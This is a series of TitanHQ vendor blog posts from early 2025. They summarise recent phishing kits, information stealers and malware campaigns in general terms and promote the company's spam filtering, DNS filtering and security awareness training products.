TitanHQ’s web filter, WebTitan, is easy to implement and use, is automatically updated with the latest threat intelligence, and provides exceptional protection against web-based threats. When coupled with the SafeTitan security awareness training and phishing simulation platform, businesses will be well protected against ValleyRAT malware and other web-delivered malware payloads. Give the TitanHQ team a call to discuss these and other cybersecurity solutions to better protect you against the growing malware threat.
by titanadmin | Feb 28, 2025 | Industry News, Phishing & Email Spam, Spam Software
TitanHQ’s SpamTitan and PhishTitan solutions achieved perfect scores in the Virus Bulletin tests in February, blocking 100% of phishing emails, 100% of spam emails, and 100% of malware, with a 0% false positive rate. The unbeatable test scores in the latest round of tests follow impeccable scores in Q4, 2024, when the engine that powers the SpamTitan and PhishTitan solution ranked top out of all tested email security solutions with a 100% phishing and malware detection rate, and a 0.00% false positive rate. The high scores in Q4, 2024 saw TitanHQ ranked in 1st place for overall score, beating all other market-leading anti-spam software solutions including the anti-spam solutions from Mimecast, N-Able, Fortinet, Sophos, and others. In the previous quarter, TitanHQ ranked joint first. The strong performance in the tests earned TitanHQ its third consecutive VBSpam+ award.
Virus Bulletin is a highly respected security information portal and certification body that has earned an excellent reputation among the information security community by providing independent intelligence about the latest global threats. Virus Bulletin has been conducting regular benchmarking tests of security solutions for more than 20 years, with the test results giving IT security professionals invaluable information on the most effective security solutions to deploy to stop malware and phishing threats.
The latest round of tests was conducted over 16 days in February, with the SpamTitan and PhishTitan solutions blocking all threats and spam emails. The final results for Q1, 2025 are due to be announced at the end of March, with TitanHQ on track to earn its fourth consecutive VBSpam+ certification. “We’re excited to have significantly exceeded the industry benchmark in these interim results,” said Ronan Kavanagh, CEO at TitanHQ. “We’re now on track to receive a fourth consecutive VB+ award in Q1. These results highlight our relentless dedication to delivering top-tier email security, and we will continue safeguarding our clients against emerging cyber threats.”
The exceptional detection rates have prompted many managed services providers to migrate to TitanHQ from other solutions, keen to ensure their clients get the very best protection. Not only does TitanHQ deliver immediate and substantial threat mitigation, all solutions have been developed from the ground up to meet all the needs of MSPs, ensuring exceptional protection with minimal management overhead.
The SpamTitan spam filtering service includes a spam filter for incoming mail, an outbound spam filter, email sandboxing, dual antivirus engines, malicious link detection, and machine learning-based detection, ensuring exceptional protection from the full range of email threats. The next-generation email sandbox detects malware based on its behavior, allowing novel malware threats to be detected that signature-based detection misses while only causing minimal delays to message delivery. In the tests, TitanHQ was in the green for all speed tests.
If you want the very best in threat protection and exceptional value for money, why not make the switch to TitanHQ. Give the team a call today to find out more or take advantage of the free trial and see the difference TitanHQ solutions make.
by titanadmin | Feb 27, 2025 | Spam Software
Phishing is still the leading technique used by cybercriminals, and the availability of LLMs for crafting perfect phishing emails and the abuse of legitimate services for sending emails ensures that cybercriminals get a sufficiently high success rate.
Cybercriminals’ tactics are constantly evolving and they are increasingly able to defeat traditional security measures. One recent report suggests that 70% of phishing emails successfully pass DMARC authentication checks, with more than 50% of phishing emails passing through businesses’ email security defenses.
Not only is phishing the most popular technique, attacks are increasing. To a large extent, the increase in attacks has been driven by the availability of phishing kits. Phishing kits provide cybercriminals with everything they need to perform successful phishing campaigns aside from the email addresses to target, and they can easily be purchased on cybercrime forums. The phishing kits open up phishing to a broad range of individuals, allowing them to conduct campaigns with ease, monitor performance, and automate campaigns and credential theft.
Phishing kits are offered on cybercrime forums and Telegram, with the Darcula phishing-as-a-service platform being one of the most comprehensive tools. When the phishing kit was released last year, it used around 20,000 domains that spoofed well-known brands and has since been used to conduct phishing campaigns in more than 100 countries. Now a new version of the platform is about to be released with even more features to make conducting phishing campaigns even easier.
What is particularly concerning about this platform is its ability to create DIY phishing kits to target any brand. Any user of the kit can simply provide the URL for the brand they want to target and the kit will generate all required templates for the attack, including cloning the legitimate site for the phishing landing page. The kit also includes pre-made templates for capturing passwords, credit card numbers, and for MFA entry prompts.
The latest version also includes a user-friendly dashboard, IP and bot filtering, performance measurement metrics to determine the effectiveness of phishing campaigns, automated credit card theft and digital wallet loading, and the removal of technical skills requirements, making it as easy as possible to conduct extensive phishing campaigns.
With AI tools helping to make phishing campaigns more effective and new phishing kits being developed to remove the need for any technical skills, phishing attacks are likely to continue to increase and businesses need to ensure that they have appropriate defenses in place.
The good news is TitanHQ can help. TitanHQ offers two solutions for protecting corporate email accounts from phishing and malware, the SpamTitan spam filtering service and the PhishTitan anti-phishing solution for Microsoft 365. The engine that powers both of these solutions is regularly tested for effectiveness by Virus Bulletin. In Q3, 2024, TitanHQ ranked joint first for protection, in sole 1st place in Q4, 2024, and in the latest tests in February, achieved perfect scores for phishing detection, malware detection, and spam detection, scoring 100% in all three areas with a 0.00% false positive rate.
The exceptional scores for phishing detection and malware blocking have prompted many MSPs to make the switch to TitanHQ to ensure they can give their clients the very best in protection and increasing numbers of SMBs are choosing TitanHQ as their antispam software and anti-phishing partner.
In addition to these technical solutions, TitanHQ offers a comprehensive security awareness training and phishing simulation platform to help businesses improve their human defenses by eradicating poor security practices and teaching employees how to identify phishing emails.
While it is bad news that phishing attacks continue to increase, with TitanHQ as your security partner, your business will be well protected. Give the TitanHQ team a call today to find out more or take advantage of a free trial of TitanHQ solutions and put them to the test.
by titanadmin | Feb 27, 2025 | Phishing & Email Spam, Security Awareness, Spam Software
Cybercriminals have extensively used ransomware in their attacks on businesses, government entities, and critical infrastructure, and while these attacks often make headline news and cause massive disruption, there is a much more common malware threat – Information stealers.
Information stealers are malware that is silently installed on devices that can remain undetected for long periods of time. These types of malware have many different capabilities and can serve as downloaders for other malicious payloads, but their main function is information theft. Information theft is achieved in several ways, depending on the malware variant in question. These malware types often have keylogging capabilities and can record keystrokes as they are entered on the keyboard, allowing sensitive information such as usernames and passwords to be captured. They can often record audio from the microphone, take control of the webcam and record video, and take screenshots. They can also steal browser histories, cookies, and other sensitive information.
The information stolen from the victim allows the threat actor to conduct follow-on attacks, access accounts and steal further sensitive data, access and drain financial accounts, or commit identity theft and other types of fraud. Information stealers can also provide a threat actor with access to a device, and that access is often sold to specialized cybercriminal groups such as ransomware actors. Many hackers now act as initial access brokers, using information stealers to gain access before selling that access to other cybercriminal groups.
Information stealers such as Lumma, AgentTesla, FormBook, Redline, and StealC have been increasingly used in recent years, especially last year. Check Point observed a 58% increase in attacks from the previous year, and a report from the threat intelligence firm KELA suggested that lists of credentials obtained from information stealers are being shared on cybercrime forums. The credential lists included billions of logins that had been captured from infected devices, which, according to KELA, included around 4.3 million devices, of which around 330 million credentials had been stolen. An estimated 40% were corporate credentials.
The breach notification service, Have I Been Pwned (HIBP), has recently added 284 million compromised accounts to the service. The credentials were identified from chats on a Telegram channel called ALIEN TXTBASE, with the data obtained from information stealer logs. HIBP founder Troy Hunt said the stealer logs included 23 billion rows of data with 493 million unique website and email address pairs and around 284 million unique email addresses. Hunt said 244 million passwords were not previously known to the HIBP service, with 199 million already in its database.
The extent to which these malware variants are used, and the increase in use in 2024, clearly demonstrates the importance of advanced malware protection and the sheer number of compromised credentials suggests many businesses have been infected with information stealers. The problem for businesses is that these malware variants can be difficult to identify, as new versions are constantly being released. Traditional antivirus software is signature-based, which means it can only detect known malware. When new malware is identified, a signature of that malware is obtained and fed into antivirus software. If a malware signature is not in the software’s definition list, it will not be detected. There are several ways that these information stealers are distributed, with email being one of the most common. They can also be downloaded from the internet from malicious websites in drive-by downloads or installed along with pirated software or doctored versions of legitimate software installers.
Defending against information stealers requires a combination of measures – a defense-in-depth approach, with multiple overlapping layers of security. Given the high volume of infections stemming from email, businesses need a spam filter to block malicious emails. Antispam software will block many malicious emails; however, an antispam server must have advanced antimalware defenses. That means traditional signature-based detection and advanced behavioral detection to ensure previously unseen malware is identified and blocked.
SpamTitan uses dual anti-virus engines for detecting known threats and a next-generation email sandbox for behavioral analysis. If standard checks are passed, suspicious messages are sent to the sandbox – a safe environment where they are detonated and their behavior is analyzed. This vastly improves the detection rate, and in recent independent tests, SpamTitan outperformed all other tested email security solutions and had a 100% malware detection rate.
Security awareness training needs to be provided to the workforce to ensure that employees have the skills to recognize and avoid threats, no matter where they are encountered. Through training, employees should be conditioned to always report potential threats to their security team, and businesses can promote security best practices and eradicate risky behaviors. TitanHQ offers businesses a comprehensive training and phishing simulation platform – SafeTitan – that has been shown to be highly effective at improving employees’ security awareness.
Many malware infections occur via the Internet, and while training can reduce risk, a technical security solution is required to block threats. WebTitan is a DNS-based web filter that is used to block access to known malicious websites, assess websites in real-time for malicious content, block certain file downloads from the Internet, and restrict the sites and web pages employees can access.
With these three security solutions in your arsenal, you will be able to significantly improve your security posture and block information stealers and other threats. Give the TitanHQ team a call today to find out more or take advantage of a free trial of these solutions.
by titanadmin | Feb 26, 2025 | Phishing & Email Spam, Security Awareness, Website Filtering
A ransomware group called EncryptHub has been accelerating attacks and is now known to have breached the networks of more than 600 organizations worldwide. EncryptHub has been active since June 2024 and gains initial access to victims’ networks via spear phishing attacks, with initial contact made via SMS messages rather than email.
The group impersonates commonly used corporate VPN products such as Palo Alto GlobalProtect and Cisco AnyConnect as well as Microsoft 365, and drives traffic to its malicious domains by making contact via personalized SMS messages (smishing) or the phone (vishing).
If vishing is used and the victim is contacted by phone, EncryptHub impersonates a member of the IT helpdesk and uses social engineering techniques to trick them into disclosing their VPN credentials. The phone number is spoofed to make it appear that the call is coming from inside the company or Microsoft Teams phone numbers are used. The victim is told that there is a problem with the corporate VPN that needs to be resolved, and if the scam works, the user is sent a link via SMS that directs them to a domain that resembles the VPN solution used by that company. If the user enters their credentials, they are used in real-time to log in, and if there are any multifactor authentication prompts, the threat actor is able to obtain them on the call. After successfully gaining access, the user is redirected to the genuine login page for their VPN, and the call is terminated.
Another tactic used by the group involves SMS messages with a fake Microsoft Teams link with the goal of capturing their Microsoft 365 credentials. The user is directed to a Microsoft Teams-related login page and the threat actor exploits Open URL parameters on microsoftonline.com to harvest email addresses and passwords, while the user believes they are interacting with the legitimate Microsoft service. Once access is gained, the group uses PowerShell scripts and malware to gain persistence, then moves laterally, steals data, deploys the ransomware payload, and issues a ransom demand.
The group’s tactics are highly effective, as in contrast to spear phishing via email, it is difficult to block the initial contact via SMS or over the phone. The key to preventing these attacks is improving the security awareness of the workforce and using a web filter to prevent the phishing domains from being accessed by employees. TitanHQ’s web filter, WebTitan, is a DNS-based web filtering solution that is constantly updated with the latest threat intelligence from multiple sources to provide up-to-the-minute protection against new phishing domains. Any attempt to visit a known phishing domain or other malicious site will be blocked, with the user directed to a locally hosted block page.
Regular security awareness training for the workforce is vital to teach security best practices and raise awareness of the tactics used by cybercriminals to breach corporate networks. With the SafeTitan security awareness training platform, businesses can easily create training programs tailored for individuals, roles, and departments, and automate those campaigns so they run continuously throughout the year, delivering training in small chunks on a weekly or monthly basis. It is easy to incorporate new training in response to changing threat actor tactics to increase awareness of specific threats. The platform also includes a phishing simulator for running phishing simulations on the workforce to reinforce training and identify knowledge gaps. If a phishing simulation is failed, training is automatically delivered to the user in real time, relevant to the threat they failed to identify. This ensures training is delivered at the point when it is likely to be most effective.
For more information on TitanHQ solutions, including the WebTitan DNS filter and the SafeTitan security awareness training platform, give the TitanHQ team a call today. Both solutions are available on a free trial to allow you to assess them fully before making a purchase decision.
by titanadmin | Feb 20, 2025 | Phishing & Email Spam
Information stealers are one of the most common ways that initial access is gained to business networks, and the extent to which these malware variants are used is alarming. According to Hudson Rock, an estimated 30 million computers have been compromised using information stealers in the past few years and Check Point reports that infections have increased by 58% in the past year.
Cybercriminals specialized in infecting devices distribute their information stealers, which collect sensitive data such as session cookies and login credentials, allowing access to be gained to corporate networks. Oftentimes, the cybercriminals then sell that access to other cybercriminal groups, acting as initial access brokers. The groups that they work with have their own specialisms, such as conducting ransomware attacks. These malware variants are capable of stealing large amounts of sensitive information from compromised devices. They can exfiltrate files, obtain web browser data and passwords, and steal cryptocurrency extensions. Infection with an information stealer can result in the large-scale theft of data, compromised accounts, and further attacks, including ransomware infections.
Security researchers have recently uncovered a new campaign that distributes information stealers such as Lumma and ACR Stealer via cracked versions of legitimate software. The pirated software can be obtained and used free of charge, albeit illegally, and is available through warez sites and from peer-to-peer file-sharing networks. The installers have been packaged to silently deliver an information stealer. Cybercriminals often use SEO poisoning to get their malicious sites to appear high in search engine listings or add malicious adverts to legitimate ad networks (malvertising) to get them to appear on high-traffic websites. The adverts direct internet users to download sites. Initial contact is also made via email, with workers tricked into opening malicious files that launch scripts that deliver the information stealer payload or direct users to websites where the malware is downloaded under the guise of a legitimate program. Contact may also be made via the telephone, with the criminals impersonating IT helpdesk staff and tricking employees into downloading the malware.
Defending against information stealers means improving defenses against all these tactics, and that means there is no single cybersecurity solution or measure that will be effective against them all, but there are three important cybersecurity measures that you should strongly consider: anti-spam software, a DNS filter, and security awareness training.
Anti-spam Software
Many malware infections occur via email, either through attachments containing malicious scripts or via hyperlinks to websites from which malware is downloaded. When malicious attachments are used, they are not always detected by antispam software and can easily reach end users. To improve detection, email sandboxing is required, where messages are sent to the sandbox for deep inspection. In the sandbox, hyperlinks are also followed to identify any downloads that are triggered. If malicious actions are confirmed, the messages are quarantined and are not deleted.
A DNS Filter
Since many malware infections occur via the Internet, businesses should consider web filtering software. DNS-based web filters allow businesses to control the web content that users can access, block certain file downloads from the internet, and assess web content in real-time for malicious content, without the latency associated with other types of web filters. A DNS filter can prevent users from accessing malicious content and will reduce reliance on employees recognizing and avoiding threats.
Security Awareness Training
Anti-spam software and DNS filters will greatly improve security; however, employee security awareness also needs to be improved. Through regular security awareness training, businesses can eliminate risky practices and train employees how to recognize and avoid threats. By providing training continuously in small chunks throughout the year, businesses can develop a security culture and significantly improve their human defenses.
TitanHQ offers multi-award-winning cybersecurity solutions for SMBs and managed service providers (MSPs) that are easy to implement and offer exceptional protection, including the SpamTitan cloud-based spam filtering service, the WebTitan DNS filter, and the SafeTitan security awareness training and phishing simulation solution. All three solutions are available on a free trial to allow you to see for yourself the difference they make before making a purchase decision. Give the TitanHQ team a call to find out more and to discuss these options, and take the important first step toward improving your defenses.
by titanadmin | Feb 18, 2025 | Phishing & Email Spam
A growing number of businesses are implementing multi-factor authentication to add an extra layer of security and improve defenses against phishing attacks. While multifactor authentication (MFA) can prevent unauthorized individuals from accessing accounts using compromised credentials, MFA does not provide total protection. Several phishing kits are sold on hacking forums and Telegram that are capable of bypassing MFA, and a new phishing kit has recently been identified that can intercept credentials in real-time and bypass MFA through session hijacking. The phishing kit is being used to steal credentials and access Gmail, Yahoo, AOL, and Microsoft 365 accounts.
The Astaroth phishing kit has been offered on cybercrime forums since at least January 2025. Similar to the Evilginx phishing kit, Astaroth uses a reverse proxy to intercept and manipulate traffic between the victim and the legitimate authentication of the account being targeted. A cybercriminal can use the Astaroth phishing kit in an adversary-in-the-middle attack, capturing not only login credentials but also 2FA tokens and session cookies, thereby bypassing MFA. The credential theft and session hijacking take place in real time, allowing the cybercriminal to instantly access the user’s account.
The user is presented with a phishing link, which is commonly communicated via email. If that link is clicked, the user is directed to a server and is presented with what appears to be a legitimate login page. The page has valid SSL certificates, so no security warnings are generated. The server acts as a reverse proxy, and when the username and password are entered, they are captured and forwarded to the legitimate authentication service in real time.
The cybercriminal is alerted about the credential capture via the admin panel of the phishing kit or via Telegram, and the one-time passcodes, usually generated via SMS, push notifications, or authentication apps, are intercepted as they are entered by the user. When session cookies are generated, they are immediately hijacked and injected into the attacker’s browser, which means the attacker can impersonate the genuine user without needing their username, password, or 2FA token, since the session has already been authenticated. The kit also includes bulletproof hosting and reCAPTCHA bypasses and allows the attacker to access the account immediately before the user suspects anything untoward has happened.
Phishing kits such as Astaroth are able to render multifactor authentication useless, demonstrating why it is so important to have effective anti-spam software, capable of identifying and blocking the initial phishing emails. SpamTitan is frequently rated as the best spam filter for business due to its ease of implementation and use, exceptional detection, and low false positive rate. TitanHQ also offers MSP spam filtering, with the solution developed from the ground up to meet all MSP needs. In recent independent tests by VirusBulletin, SpamTitan outperformed all other tested email security solutions, achieving the highest overall score thanks to a 100% malware catch rate, 100% phishing catch rate, 99.999% spam catch rate, and a 0.000% false positive rate. The exceptional performance is due to extensive threat intelligence feeds, machine learning to identify phishing attempts, and email sandboxing to detect and block malware and zero-day threats.
In addition to an advanced spam filtering service, businesses should ensure they provide regular security awareness training to the workforce and reinforce training with phishing simulations. SafeTitan from TitanHQ is an easy-to-use security awareness training platform that makes it easy to create effective training courses and automate the delivery of training content. The platform also includes a phishing simulator with an extensive library of phishing templates that makes it easy to create and automate phishing simulations, generating relevant training automatically if a user is tricked. That means training is delivered at the point when it is likely to be most effective at correcting behavior.
Give the TitanHQ team a call today for more information about these solutions. TitanHQ’s SpamTitan and SafeTitan products, like all TitanHQ solutions, are also available on a free trial.
by titanadmin | Feb 16, 2025 | Security Awareness, Spam Software
A phishing campaign has been identified that targets corporate Facebook credentials and has so far involved more than 12,000 messages to users worldwide. The campaign has primarily targeted enterprises in the European Union (45.5%), United States (45%), and Australia (9.5%) with the phishing emails sent using a legitimate Salesforce automated mailing service. When emails are sent via this service, a sender email address can be specified; however, if no address is supplied, the emails appear to have been sent directly from Salesforce from the noreply@salesforce.com email address, per the terms of service. As such, any recipient of the email may mistakenly believe that the emails are official.
The emails include fake versions of the Facebook logo, which recipients should be able to identify as fake; however, the emails are well-written, and the subject matter is sufficiently concerning to warrant a click. The emails warn the recipient about a copyright infringement claim that has been filed under the Digital Millennium Copyright Act (DMCA) against the user’s personal account, indicating material has been shared via their account that is in violation of copyright laws.
The messages include the date of the complaint, that it was reported by Universal Music Group, and is due to the unauthorized use of copyrighted music. The recipient is told they must respond to the claim by the close of business if they wish to contest the claim. The date of the required response is only 24 hours after the complaint date, therefore an immediate response is required. As is common with phishing attempts, there is a threat – permanent restrictions on the user’s Facebook account. The message includes a button to click to contest the claim, but rather than direct the user to a login page, they are directed to a fake support page, where they are provided with further information on the restrictions that have or will be applied. Several variations of that email have been identified, including warnings that Facebook surveillance systems have identified a copyright issue and, as a result, limitations have been placed on the user’s account.
Those restrictions include the disabling of personal ad accounts and audiences, blocking the management of advertising assets or people for businesses, and preventing the user from creating or running ads and managing ad accounts. In order to have those restrictions removed, the user must click the button to request a review, which directs the user to a spoofed Facebook login page. If credentials are entered, they will be captured and used to log in to the user’s account. The campaign, identified by Check Point Research, targets business users, many of whom will rely on Facebook for advertising and customer contact, therefore the consequences of an account restriction could be serious, and certainly serious enough to warrant filing an appeal. What is unclear is how the threat actor uses the compromised accounts. Potentially they could be used for further scams, which could cause considerable reputational damage to the business.
Protecting against these types of phishing campaigns requires a combination of email security and user awareness. An email security solution can prevent these messages from reaching inboxes, thus neutralizing the threat, but security awareness training should also be provided to workforce members to help them identify and avoid phishing attempts. In this case, Facebook admins for the business should be warned about the campaign and instructed to log in to Facebook directly via their web browser if they receive any copyright infringement notices purporting to have been sent by Facebook. If there is a problem with their account, it will be apparent when login into their account.
With the SafeTitan security awareness training platform from TitanHQ, it is easy to create and automate security awareness training programs and roll out new training content in relation to specific threats, only providing that training to the individuals who are likely to be targeted. Phishing simulations can easily be created to test awareness of these phishing scams, with relevant training automatically delivered in response to clicks on phishing emails.
TitanHQ’s anti-spam software, SpamTitan, provides excellent protection against phishing, as demonstrated by recent tests by VirusBulletin. The cloud-based anti-spam service outperformed all other antispam solutions in the latest round of tests, blocking 100% of phishing emails and 100% of malware, earning SpamTitan the top spot for overall score. If you are not happy with your anti-phishing defenses or feel you are paying too much for protection, give the TitanHQ team a call and ask about SpamTitan. If you have yet to provide regular security awareness training to your workforce, why not sign up for a free trial of Safetitan and put the product to the test on your workforce?
by titanadmin | Feb 14, 2025 | Phishing & Email Spam
Security awareness training programs teach employees to be constantly alert to potential phishing emails, especially emails with file attachments. Most employees will be aware that Office documents can contain macros, which if allowed to run, can download malware onto their device, but they are likely much less suspicious about image files. Image files are far less likely to be malicious; however, there is an image file format that can contain malicious content – SVG files – and they are increasingly being used in phishing campaigns.
An SVG or Scalable Vector Graphics file is XML-based, which means it can be scaled without loss of quality. These file types are commonly used for icons and buttons and are extensively used in graphic design, including for company logos. Image files may seem pretty innocuous, but one of the properties of SVG files, unlike non-scalable image formats such as Jpegs, is they can be created to include scripts, anchor tags, and other types of active web content. When opening an SVG file, unless a computer has been configured to open the file using a specific image program, the file will be opened in a web browser.
One campaign incorporated the SharePoint logo and advised the user that a secure document has been shared through Microsoft SharePoint. The image included a folder icon with the file name “Updated Compensation and Benefits”, and an “open” button that the user is encouraged to click. Clicking that button directs the user to a phishing page where they must enter their credentials to view the file. Those credentials will be captured and used to access the user’s account. Many phishing campaigns that use SVG file attachments include hyperlinks that direct the user to a site that spoofs a well-known brand such as Microsoft to harvest credentials, such as displaying a fake Microsoft 365 login page. These phishing pages have been designed to be indistinguishable from the genuine login prompt and may even autofill the user’s login name into the login prompt.
There are two main advantages to using SVG files in phishing campaigns. First and foremost, the file is less likely to be flagged as malicious by an email security solution, many of which do not analyze the content of SVG files, therefore ensuring messages containing SVG files are delivered to an end user’s inbox. Secondly, since awareness of malicious SVG files is low, the targeted individuals may be easily tricked into clicking on the hyperlink. The use of SVG files in phishing campaigns is becoming more common, and this trend is likely to continue in 2025. Businesses should ensure that they have adequate defenses to block these attacks, which should consist of advanced anti-spam software to block these phishing emails, and security awareness training content should be updated to raise awareness of this attack technique.
SpamTitan is an advanced spam filtering service from TitanHQ that has been proven to block more phishing emails than other email security solutions. SpamTitan was recently put to the test by VirusBulletin and outperformed all other tested anti-spam software solutions, blocking 100% of malware, 100% of phishing emails, and 99.999% of spam emails, with a 0.000% false positive rate. Machine learning algorithms ensure that the solution gets better over time, extensive threat intelligence feeds keep the solution automatically updated with up-to-the-minute threat intelligence, and a next-generation email sandbox provides exceptional protection against malware. When coupled with the SafeTitan security awareness training and phishing simulations to improve employee awareness, businesses will be well protected against phishing, malware, and other email-based attacks. Give the TitanHQ team a call today for more information about these solutions or take advantage of a free trial and see for yourself the difference these solutions make to your security posture.
by titanadmin | Feb 3, 2025 | Phishing & Email Spam, Security Awareness, Spam Software
Investigations of cyberattacks have identified an increasing number of incidents that started with email bombing. A high percentage of cyberattacks involve phishing, where emails are sent to employees to trick them into visiting a malicious website and disclosing their credentials, or opening a malicious file that installs malware. Email bombing is now being used to increase the effectiveness of phishing campaigns.
With email bombing, the user is sent a large number of spam emails in a short period of time, such as by adding a user to a large number of mailshots, news services, and spam lists. The threat actor creates a genuine spam issue then impersonates a member of the IT department and claims they can fix the problem, with content often made via a Microsoft Teams message. If the user accepts, they are tricked into installing remote access software and granting the threat actor remote access to their device. The threat actor will establish persistent access to the user’s device during the remote access session. What starts with an email bombing attack often ends with a ransomware attack.
There are several measures that you should consider implementing to prevent these attacks. If you use Microsoft Teams, consider restricting calls and messages from external organizations, unless there is a legitimate need to accept such requests. If so, ensure permission is only given to trusted individuals such as business partners. The use of remote access tools should be restricted to authorized personnel only, and steps should be taken to prevent the installation of these tools, including using a web filter to block downloads of these tools (and other executables) from the Internet.
An spam filter should be implemented to block spam and unwanted messages. Advanced spam filters such as SpamTitan use AI-guided detection and machine learning to block spam, phishing, and other malicious emails, along with email sandboxing to identify novel threats and zero-day malware. In the Q4, 2024, tests at VirusBulletin, the SpamTitan spam filtering service blocked 99.999% of spam emails, 100% of phishing emails, and 100% of malware with a 0.000% false positive rate, earning SpamTitan top position out of all anti-spam software under test.
Businesses should not underestimate the importance of security awareness training and phishing simulations. Regular security awareness training should be provided to all members of the workforce to raise awareness of the tactics used by cybercriminals. A cyberattack is much more likely to occur as a result of a phishing or social engineering attempt than the exploitation of a software vulnerability. Businesses that use the SafeTitan security awareness training platform and phishing simulator have reduced susceptibility to email attacks by up to 80%. For more information on TitanHQ cybersecurity solutions, including award-winning anti-spam solutions for managed service providers, give the TitanHQ team a call or take advantage of a free trial of any of TitanHQ’s cybersecurity solutions.
by titanadmin | Jan 31, 2025 | Phishing & Email Spam, Security Awareness, Spam News
As the massive cyberattack on Change Healthcare demonstrated last year, the failure to implement multifactor authentication on accounts can be costly. In that attack, multifactor authentication was not implemented on a Citrix server, and stolen credentials allowed access that resulted in the theft of the personal and health information of 190 million individuals. The ransomware attack caused a prolonged outage and remediation and recovery cost Change Healthcare an estimated $2.9 billion last year.
The attack should serve as a warning for all companies that multifactor authentication is an essential cybersecurity measure – If passwords are compromised, access to accounts can be prevented. Unfortunately, multifactor authentication protection can be circumvented. Threat actors are increasingly using phishing kits capable of intercepting multifactor authentication codes in an adversary-in-the-middle attack. Phishing kits are packages offered to cybercriminals that cover all aspects of phishing. If purchased, phishing campaigns can be conducted with minimal effort as the phishing kit will generate copies of websites that impersonate well-known brands, the infrastructure for capturing credentials, and templates for phishing emails. After paying a fee, all that is required is to supply the email addresses for the campaign, which can be easily purchased on hacking forums.
Some of the more advanced phishing kits are capable of defeating multifactor authentication by harvesting Microsoft 365 and Gmail session cookies, which are used to circumvent MFA access controls during subsequent authentication. One of the latest phishing kits to be identified is has been dubbed Sneaky 2FA. The kit was first identified as being offered and operated on Telegram in October 2024 by researchers at the French cybersecurity firm Sekoia. The researchers identified almost 100 domains that host phishing pages created by the Sneaky 2FA phishing kit.
As with a standard phishing attack, phishing emails are sent to individuals to trick them into visiting a phishing page. One campaign using the Sneaky 2FA phishing kit uses payment receipt-related emails to trick the recipient into opening a PDF file attachment that has a QR code directing the user to a Sneaky 2FA page on a compromised website, usually a compromised WordPress site. These pages have a blurred background and a login prompt. Microsoft 365 credentials are required to access the blurred content. The phishing pages automatically add the user’s email address to the login prompt, so they are only required to enter their password. To evade detection, multiple measures are employed such as traffic filtering, Cloudfire Turnstile challenges, and CAPTCHA checks.
Many phishing kits use reverse proxies for handling requests; however, the Sneaky 2FA phishing server handles communications with Microsoft 365 API directly. If the checks are passed, JavaScript code is used to handle the authentication steps. When the password is entered, the user is directed to the next page, and the victim’s email address and password are sent to the phishing server via an HTTP Post. The server responds with the 2FA method for the victim’s account and the response is sent to the phishing server. The phishing kit allows session cookies to be harvested that provide account access, regardless of the 2FA method – Microsoft Authenticator, one-time password code, or SMS verification.
Phishing kits such as Sneaky FA make it easy for cybercriminals to conduct phishing attacks and defeat MFA; however, they are not effective at defeating phishing-resistant MFA such as FIDO2, WebAuthn, or biometric authentication. The problem is that these forms of MFA can be expensive and difficult to deploy at scale.
Businesses can greatly improve their defenses with advanced spam filter software with AI- and machine learning detection, email sandboxing, URL rewriting, QR code checks, greylisting, SPF, DKIM, and DMARC checks, and banners identifying emails from external sources. Effective email filtering will ensure that these malicious emails do not land in employee inboxes. TitanHQ offers two email security solutions – SpamTitan email security and the PhishTitan anti-phishing solution for M365. The engine that powers both solutions was recently rated in 1st place for protection in the Q4, 2024 tests by VirusBulletin, achieving a 100% malware and 100% phishing detection rate.
Regular security awareness training should also be provided to all members of the workforce to raise awareness of threats and to teach cybersecurity best practices. With the SafeTitan security awareness training platform it is easy to create and automate training courses and add in new training content when new threat actor tactics are identified. The platform also includes a phishing simulator for reinforcing training and identifying individuals in need of additional training.
For more information on improving your defenses against phishing and malware, give the TitanHQ team a call. Product demonstrations can be arranged on request and all TitanHQ solutions are available on a free trial.
by titanadmin | Jan 28, 2025 | Phishing & Email Spam, Security Awareness, Spam Software, Website Filtering
A new malware variant called PLAYFULGHOST has been discovered that is being distributed via phishing emails and websites that appear high in search engine listings through black hat search engine optimation (SEO) tactics.
PLAYFULGHOST was analyzed by Google’s Mandiant Managed Defense team, which confirmed the malware had extensive information-stealing capabilities. They include keylogging, taking screenshots, recording audio, copying information from the clipboard, stealing QQ account information, and collecting information on the installed security solutions and system metadata. The malware can also block mouse and keyboard inputs, clear Windows event logs, delete caches and profiles from web browsers, erase profiles and delete local storage for messaging apps, and the malware has file transfer capabilities and can download additional payloads. The malware achieves persistence in four ways –registry keys, scheduled tasks, establishing itself in a Windows service, and through entries in the Windows Startup folder. In short, PLAYFULGHOST is a highly capable and very dangerous new malware variant.
An analysis of the distribution methods identified SEO poisoning, where websites are promoted so they appear high in the search engine listings for search terms related to Virtual Private Network solutions, including the legitimate LetsVPN solution. If a user visits the webpage, they can download the LetsVPN installer; however, it has been trojanized to silently load PLAYFULGHOST in the memory via an interim payload. Phishing is also used to distribute the malware. While multiple lures could be used in this campaign, intercepted emails had code-of-conduct-related lures to trick the recipient into opening a malicious RAR archive that includes a Windows executable file that downloads and executes the malware from a remote server.
If infected with the malware, detection can be problematic since the malware runs in the memory, and multiple persistence mechanisms can make malware removal challenging. It is vital that infection is prevented and that requires multiple measures since the malware is distributed in different ways. To protect against malware delivery via SEO poisoning and malvertising, businesses should use a web filter and provide regular security awareness training to the workforce. The WebTitan DNS filter is a web filtering solution that protects against web-delivered malware in a variety of ways. WebTitan is fed extensive up-to-the-minute threat intelligence on malicious websites and domains and will prevent users (on and off the network) from visiting those malicious websites. That includes visits to websites through web browsing and redirects through malvertising.
WebTitan can be configured to block certain downloads from the Internet by file extension, such as installers and other executable files. In addition to preventing malware delivery, this feature can be used to control shadow IT – software installations that have not been authorized by the IT department. WebTitan can also be used to control the web content that employees can access, by blocking access to web content that serves no work purpose along with risky categories of websites.
Security awareness training is vital for making employees aware of the risks of malware downloads from the Internet. Employees should be instructed not to download software from unofficial websites, warned of the risks of malvertising, and told not to trust a website simply because it is positioned high in the search engine listings. Employees should also be warned of the risk of phishing, be taught how to identify a phishing attempt, and be conditioned to report suspicious emails to their security team. A phishing simulator should also be used to reinforce training and identify individuals who are susceptible to phishing so they can be provided with additional training. TitanHQ’s SafeTitan security awareness training and phishing simulation platform makes this as easy as possible, automating the delivery of training and phishing simulation exercises.
